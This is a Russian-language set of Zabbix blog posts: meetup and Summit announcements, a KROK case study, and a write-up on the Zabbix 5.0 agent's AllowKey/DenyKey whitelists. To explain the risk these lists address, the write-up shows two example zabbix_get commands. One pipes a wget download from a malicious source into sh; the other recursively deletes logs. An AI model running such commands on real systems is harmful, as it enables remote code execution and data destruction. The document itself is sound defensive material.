Блог компании zabbix

28 августа мы проведем уже третий по счету онлайн митап Zabbix, на котором поговорим об информационной безопасности.



Программа мероприятия:

10:00 Поддержка черных и белых списков для метрик на стороне агента, Тихон Усков, Разработчик, Zabbix
10:20 Шифрование подключений к базе данных от сервера и внешних интерфейсов, Александр Петров-Гаврилов, Инженер технической поддержки, Zabbix
10:40 Новые шаблоны IPMI, Mikrotik, MSSQL, Максим Чудинов, Разработчик, Zabbix
11:00 Вопросы и ответы

Количество мест ограничено, поэтому мы рекомендуем регистрироваться заранее.

Напоминаем, что доклады с первого онлайн митапа, посвященного выходу версии 5.0, и второго, посвященного решению технических задач, можно посмотреть в записи.

До встречи на митапе!

Валентин Нык, Руководитель отдела систем управления ИТ-инфраструктурой, КРОК

В КРОК появилась идея создать систему комплексного мониторинга (СКМ), которая заменит существующие промышленные решения. Такая потребность возникла, потому что бизнесу стало невыгодно пользоваться иностранными разработками. Они подорожали, не учитывают потребности российских клиентов и могут попасть под санкции.

Проблема

Крупные компании давно используют разные СКМ. Однако пользоваться ими стало невыгодно. Ниже расскажем, почему.

После кризиса в 2014 г. курсы валют выросли примерно в два раза. Автоматически подорожали и промышленные решения. Поэтому компании пытаются оптимизировать решения или модель владения ими.

Иностранные разработки не ориентированы на российский рынок. Клиенты из России в среднем занимают 1% от глобального рынка. Поэтому разработчики неохотно решают их проблемы.

В стране действуют санкции, а государство ведёт политику импортозамещения. Из-за этого бизнесу труднее использовать иностранное ПО.

С 2014 года у нас изменились экономические реалии. Связаны они, в первую очередь, с курсом валюты. Стоимость владения промрешением за несколько месяцев стала в два раза дороже. И даже для крупных наших заказчиков это стало проблемой. Последние лет пять многие занимаются тем, что оптимизируют модель владения технологическими решениями.

Валентин Нык, руководитель отдела систем управления ИТ-инфраструктурой ДИТ

Задача

Чтобы решить проблему, нужно разработать СКМ на альтернативном стеке решений. Такой стек может включать в себя СПО, решения с открытым исходным кодом и собственные разработки.

Требования к СКМ

Важно, чтобы СКМ не уступала по функционалу иностранным промышленным решениям, но при этом стоила дешевле.

Решение

При создании СКМ в КРОК опирались на накопленный опыт. Концептуальная архитектура СКМ в целом повторяет промышленные решения иностранных вендоров и состоит из трех основных уровней:

1. сбор данных,

   
   

2. анализ данных,

   
   

3. представление результатов мониторинга.

   
   

Архитектура СКМ

Уровень сбора данных занимает Zabbix. Система собирает данные и передает их на следующие уровни. Zabbix позволяет проводить разноплановый мониторинг и работает с различными объектами мониторинга: от серверов и операционных систем до сети и внешних систем.

На уровне аналитики решаются задачи мониторинга услуг. Данные с первого уровня используют для построения ресурсно-сервисных моделей, машинного обучения, обработки графов и аналитики.

На уровне представления используется классический набор решений. С их помощью данные, собранные на первом уровне, можно представить по-разному, например, в виде графиков или 3D-моделей.

С помощью Zabbix компания КРОК создала СКМ, которая:

• закрывает все логические уровни в классической ИТ-инфраструктуре,
• не уступает по функционалу иностранным промышленным решениям,
• может быть адаптирована к требованиям заказчиков,
• позволяет проводить интеллектуальный анализ и постанализ данных по любым моделям.

Где ещё можно использовать Zabbix

Ниже представлены кейсы компании КРОК, в которых использована система Zabbix.

• Zabbix и SOC**.** По статистике, основной источник событий, связанных с информационной безопасностью, события из ИТ-инфраструктуры. Если интегрировать SOC с Zabbix, то система мониторинга станет источником этих событий для SOC. Такая интеграция позволяет принимать взвешенные решения по отработке инцидентов ИБ.
• Zabbix и система управления. Любую систему управления можно сделать более гибкой. Для этого нужны данные интеллектуального мониторинга. Система проанализирует их и будет принимать решения, которые учитывают реальную ситуацию в ИТ-инфраструктуре.
• Zabbix и управление мощностями. Развивающемуся бизнесу часто требуются новые мощности. Покупать дополнительное оборудование и софт дорого. Выгоднее оптимизировать те, что уже есть.

С оптимизацией помогает Zabbix. Система служит источником больших данных, на основе которых можно строить модели и делать прогнозы.

• Мониторинг как услуга. В России начинают развиваться management services, платные услуги ИТ-компаний для бизнеса. Мониторинг тоже можно продавать в качестве такой услуги. В этом случае Zabbix будет отличным источником данных для расчёта стоимости владения, оказания платных ИТ-услуг.

Возможности Zabbix

---

Компания КРОК российский разработчик ПО, мобильных приложений, интегрированных платформ, решений для защиты данных и оптимизации их хранения. Сотрудничает с более чем 270 производителями оборудования и ПО. Её услуги и решения направлены на повышение эффективности работы компаний с помощью ИТ. В приоритете компании комплексный подход, который сочетает оптимизацию инфраструктуры и автоматизацию бизнес-процессов.

Штаб-квартира: Россия, Москва
Количество сотрудников: 1 777
Дата основания: 1992 г.

Zabbix Summit мероприятие, на котором можно узнать о выдающихся случаях использования Zabbix и ознакомиться с техническими решениями, представленными мировыми ИТ экспертами. Девять лет подряд мы организовывали мероприятия, собирающие сотни посетителей из десятков стран. В этом году мы принимаем новые правила и переходим на онлайн-формат.

Программа

Программа Zabbix Summit Online 2020 будет в основном посвящена релизу Zabbix 5.2 (ожидается, что он будет анонсирован до начала мероприятия). Команда инженеров Zabbix охватит множество технических тем, а также расскажет о возможностях нового релиза. Традиционно, с докладами выступят эксперты Zabbix со всего мира и поделятся самыми интересными и сложными случаями применения Zabbix.

Помимо технической информации, вы сможете узнать о профессиональных услугах Zabbix, познакомиться с членами команды и пообщаться с пользователями из разных сфер бизнеса и стран.

Как все будет происходить

В отличие от обычного двухдневного мероприятия, в этом году саммит пройдет в течение одного дня и таким образом, что в нем смогут принять участие гости со всего мира.
Мы начнем с докладов команды и членов сообщества Zabbix из Японии, когда в европейской части земного шара будет раннее утро. Следующим присоединится китайское представительство Zabbix и продемонстрирует интересные кейсы использования, реализованные экспертами Zabbix в этом регионе. Третий блок саммита будет наиболее продолжительным. Он объединит выступления представителей Европы и России. Во время этой части саммита выступят также исполнительный директор Zabbix Алексей Владышев и технические инженеры Zabbix. После европейского сегмента саммит продолжится выступлениями докладчиков из Бразилии. А заключительная секция будет посвящена США. Посетители получат возможность ознакомиться с интересными примерами использования Zabbix местными компаниями и лично обсудить с местными экспертами насущные вопросы.

Все региональные части Саммита будут разделены онлайн кофе-брейками, во время которых вы сможете посмотреть живые интервью со спикерами, а также пообщаться с другими участниками в специальных чат-комнатах. Для ответа на вопросы будут организованы Q&A сессии.

Вы можете спросить, как насчет традиционных технических воркшопов? Об этом мы тоже подумали. Воркшопы будут проведены во время следующей после саммита недели как членами нашей команды, так и спонсорами мероприятия. У вас будет возможность выбрать и принять участие во всех сессиях, которые покажутся вам интересными.

Что еще вы должны знать

Важной отличительной чертой мероприятия этого года является то, что участие в саммите будет бесплатным. Однако при желании у вас есть возможность оказать финансовую поддержку мероприятию:

• Став спонсором мероприятия
• Приобретая пакет фаната Zabbix

Со списком бонусов, которые предлагает вашей компании каждый уровень спонсорства, можно ознакомиться в спонсорской брошюре. Что касается фан-пакета, то он включает в себя эксклюзивный подарок, созданный специально для мероприятия кружку и футболку (доставка включена в стоимость).

Возможности участия

На данный момент регистрация открыта как для слушателей, так и для докладчиков. Регистрируйтесь, чтобы принять участие в главное событии года Zabbix, услышать последние новости от создателя Zabbix Алексея Владышева и встретить, хоть и виртуально, дружное и сплоченное сообщество пользователей Zabbix. Если у вас есть интересный опыт использования Zabbix или вы создали индивидуальное решение или шаблон, который может принести пользу сообществу, смело регистрируйтесь как спикер. Крайний срок подачи презентаций 18 сентября.

Следите за обновлениями на официальной странице мероприятия.

Присоединяйтесь к Zabbix Summit Online 2020 и узнайте о лучших мировых практиках применения Zabbix в прямом эфире.

29 сентября мы проведем четвертый онлайн митап на русском языке. Вступительную речь, а также сессию вопросов и ответов возьмет на себя создатель и исполнительный директор Zabbix Алексей Владышев. Приглашаем вас послушать интересные и полезные доклады и не упустить возможность задать интересующие вопросы напрямую создателю нашего решения для мониторинга. Регистрация на мероприятие уже открыта.

Программа:

10:00 Открытие мероприятия
Алексеем Владышев, Основатель и исполнительный директор, Zabbix

10:10 "Улучшения UI/UX в Zabbix 5.0/5.2."
Тихон Усков, Инженер интеграции, Zabbix

10:30 TBA

10:50 "Как мы доработали Zabbix-Agent для мониторинга баз данных Oracle/MySQL/PostgreSQL/MSSQL на разных ОС"
Михаил Григорьев, Cистемный инженер, Дистрибьютед Сервис

11:20 Вопросы и ответы с Алексеем Владышевым, основателем и исполнительным директором, Zabbix

До встречи на митапе!

Поддержка черных и белых списков для метрик на стороне агента

Тихон Усков, Инженер интеграции, Zabbix

Проблемы безопасности данных

В Zabbix 5.0 появилась новая функция, которая позволяет улучшить безопасность в системах с использованием Zabbix Agent и заменяет старый параметр EnableRemoteCommands.

Усовершенствование безопасности систем с использованием агента обусловлено тем фактом, что агент может выполнять большое количество потенциально опасных действий.

• Агент может собирать практически любую информацию, в том числе конфиденциального или потенциально опасного характера, из файлов конфигурации, файлов логов, файлов с паролями или любых других файлов.

Например, с помощью утилиты zabbix_get можно получить доступ к списку пользователей, их домашним каталогам, файлам с паролями и т. д.

Доступ к данным с помощью утилиты zabbix_get

ПРИМЕЧАНИЕ. Данные могут быть получены, только если агент имеет права на чтение соответствующего файла. Но, например, файл /etc/passwd/ доступен для чтения всем пользователям.

• Агент также может выполнять потенциально опасные команды. Например, ключ *system.run[]** позволяет выполнять любые удаленные команды на узлах сети, в том числе запускать из веб-интерфейса Zabbix скрипты, которые также выполняют команды на стороне агента.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• В Linux агент по умолчанию запускается без root-привилегий, тогда как в Windows он запускается как сервис от имени System и имеет неограниченный доступ к файловой системе. Соответственно, если после установки в параметры Zabbix Agent не внесены изменения, агент имеет доступ к реестру, файловой системе и может выполнять WMI запросы.

В более ранних версиях параметр EnableRemoteCommands=0 позволял только отключать метрики с ключом *system.run[]** и выполнение скриптов из веб-интерфейса, но при этом было не было возможности ограничить доступ к отдельным файлам, разрешить или запретить отдельные ключи, которые устанавливались вместе с агентом, или ограничить использование отдельных параметров.

Использование параметра EnableRemoteCommand в ранних версиях Zabbix

AllowKey/DenyKey

Zabbix 5.0 помогает защититься от такого несанкционированного доступа благодаря белым и черным спискам для разрешения и запрета метрик на стороне агента.

В Zabbix 5.0 все ключи, включая *system.run[]**, разрешены, и добавлены два новых параметра конфигурации агента:

AllowKey= разрешенные проверки;

DenyKey= запрещенные проверки;

где паттерн имени ключа с параметрами, в котором используются метасимволы (*).

Ключи AllowKey и DenyKey позволяют разрешить или запретить отдельные метрики по определенному шаблону. В отличие от других параметров конфигурации количество параметров AllowKey/DenyKey не ограничено. Это позволяет четко определить, что именно агент может делать в системе благодаря созданию дерева проверок выполняемых ключей, где очень важную роль играет порядок их написания.

Последовательность правил

Правила проверяются в том порядке, в котором они внесены в конфигурационный файл. Проверка ключа по правилам происходит до первого совпадения, и как только ключ элемента данных совпадает с паттерном, он разрешается или запрещается. После этого проверка правил останавливается, и остальные ключи игнорируются.

Поэтому если элемент соответствует и разрешающему, и запрещающему правилу, результат будет зависеть от того, какое правило будет первым в конфигурационном файле.

2 разных правила с одинаковым паттерном и ключ vfs.file.size[/tmp/file]

Порядок использования ключей AllowKey/DenyKey:

1. точные правила,
2. общие правила,
3. запрещающее правило.

Например, если вам необходим доступ к файлам в определенной папке, необходимо сначала разрешить доступ к ним, после чего запретить все остальное, что не попадает под установленные разрешения. Если в первую очередь будет использовано запрещающее правило, доступ к папке будет запрещен.

Правильная последовательность

Если необходимо разрешить запуск 2 утилит через *system.run[]**, и в первую очередь будет указано запрещающее правило, утилиты запускаться не будут, потому что первый паттерн будет всегда соответствовать любому ключу, и последующие правила будут игнорироваться.

Неправильная последовательность

Паттерны

Основные правила

Паттерн выражение с подстановочными знаками (wildcard). Метасимвол (*) соответствует любому количеству любых символов в определенной позиции. Метасимволы могут использоваться как в имени ключа, так и в параметрах. Например, можно жестко определить текстом первый параметр, а последующий указать как wildcard.

Параметры должны быть заключены в квадратные скобки [].

• system.run[* неверно
• vfs.file*.txt] неверно
• vfs.file.*[*] верно

Примеры использования wildcard.

1. В имени ключа и в параметре. В данном случае ключ не соответствует аналогичному ключу, который не содержит параметр, поскольку в паттерне мы указали, что хотим получить некое окончание имени ключа и некий набор параметров.
2. Если в паттерне не использованы квадратные скобки, паттерн разрешает все ключи, которые не содержат параметры и запрещает все ключи с указанным параметром.
3. Если ключ записан полностью, а параметры указаны как wildcard, он будет соответствовать любому аналогичному ключу с любыми параметрами и не будет соответствовать ключу без квадратных скобок, т. е. будет разрешен или запрещен.

Правила заполнения параметров.

• Если подразумевается использование ключа с параметрами, параметры должны быть прописаны в файле конфигурации. Параметры должны быть указаны как метасимвол. Необходимо осторожно запрещать доступ к какому-либо файлу и учитывать, какую информацию сможет отдавать метрика при различных вариантах написания с параметрами и без них.

Особенности написания ключей с параметрами

• Если ключ указан с параметрами, но параметры являются необязательными и указаны как метасимвол, ключ без параметров будет разрешен. Например, если вы хотите запретить получение информации о нагрузке на CPU и указываете, что ключ system.cpu.load[*] должен быть запрещен, не забывайте, что ключ без параметров вернет среднее значение нагрузки.

Правила заполнения параметров

Заметки

Настройка

• Некоторые правила не могут быть изменены пользователем, например, правила обнаружения (discovery) или авторегистрации агентов. Правила AllowKey/DenyKey не затрагивают следующие параметры:
  HostnameItem
  HostMetadataItem
  HostInterfaceItem

ПРИМЕЧАНИЕ. Если администратор запрещает какой-либо ключ, при запросе Zabbix не выдает информации о том, по какой причине метрика или ключ попадают в категорию 'NOTSUPPORTED'. В log-файлах агента информация о запретах на выполнение удаленных команд также не отображается. Это сделано из соображений безопасности, но может осложнить отладку, если метрики попадают в неподдерживаемую категорию по каким-либо причинам.

• Не стоит рассчитывать на какой-то определенный порядок подключения внешних файлов конфигурации (например, в алфавитном порядке).

Утилиты командной строки

После настройки правил необходимо удостовериться, что все настроено верно.

Можно воспользоваться одним из трех вариантов:

• Добавить метрику в Zabbix.
• Протестировать с помощью zabbix_agentd. Zabbix agent c опцией -print (-p) показывает все ключи (которые разрешены по умолчанию), кроме тех, которые не разрешены конфигурацией. А с опцией -test (-t) для запрещенного ключа вернет 'Unsupported item key'.
• Протестировать с помощью zabbix_get. Утилита zabbix_get с опцией -k вернет 'ZBX_NOTSUPPORTED: Unknown metric'.

Разрешать или запрещать

Вы можете запретить доступ к файлу и удостовериться, например, с помощью утилиты zabbix_get, что доступ к файлу запрещен.

**

ПРИМЕЧАНИЕ. Кавычки в параметре игнорируются.

При этом доступ к такому файлу может быть разрешен по другому пути. Например, если на него ведет симлинк.

Рекомендуется проверять различные варианты применения задаваемых правил, а также учитывать возможности обойти запреты.

Вопросы и ответы

Вопрос. Почему для описания правил, разрешений и запретов выбрана такая сложная схема паттерна со своим языком? Почему не было возможности воспользоваться, например, регулярными выражениями, которые использует Zabbix?

Ответ. Это вопрос производительности regex, поскольку агент, как правило, один, и он проверяет огромное количество метрик. Regex достаточно тяжелая операция, и мы не можем проверять тысячи метрик таким образом. Wildcards универсальное, шороко применяемое и простое решение.

Вопрос. Разве файлы Include подключаются не в алфавитном порядке?

Ответ. Насколько мне известно, предсказать последовательность применения правил, если вы разносите правила по разным файлам, фактически невозможно. Я рекомендую собрать все правила AllowKey/DenyKey в одном файле Include, потому что они взаимодействуют друг с другом, и подключать этот файл.

Вопрос. В Zabbix 5.0 опция 'EnableRemoteCommands=' в конфигурационном файле отсутствует, и доступны только AllowKey/DenyKey?

Ответ. Да, все верно.

Спасибо за внимание!